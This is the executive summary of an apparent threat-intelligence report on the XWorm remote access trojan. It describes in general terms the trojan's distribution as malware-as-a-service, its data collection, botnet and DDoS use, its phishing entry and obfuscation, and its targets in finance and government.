Executive Summary
XWorm is a Remote Access Trojan (RAT) type of malware and is usually distributed via the malware-as-a-service (MaaS) model. First detected in July 2022, this malware targets system resources, collects hardware information such as GPU, CPU, RAM, transmits this information to command and control servers, and uses it in Distributed Denial of Service (DDoS) attacks by turning the system into a bot. It also has dangerous capabilities such as monitoring user activities and engaging in various espionage activities.
The sources and targets of XWorm vary according to the purpose of the attack and the motivations of the threat actors behind it. While it usually targets the banking and finance sector for financial gain, it also carries out espionage attacks against state institutions. These attacks are carried out through botnet networks and servers in different countries, especially from countries such as Russia, China and North Korea.
XWorm, which usually infiltrates systems through phishing attacks, avoids detection by using various obfuscation techniques and PowerShell commands. It transforms infected devices into remotely controlled bots and uses them for data exfiltration, DDoS attacks and other malicious actions. This report details the detected technical characteristics of XWorm, its working methods and the areas where it poses a threat, and provides recommendations on the protection strategies of organisations against such threats.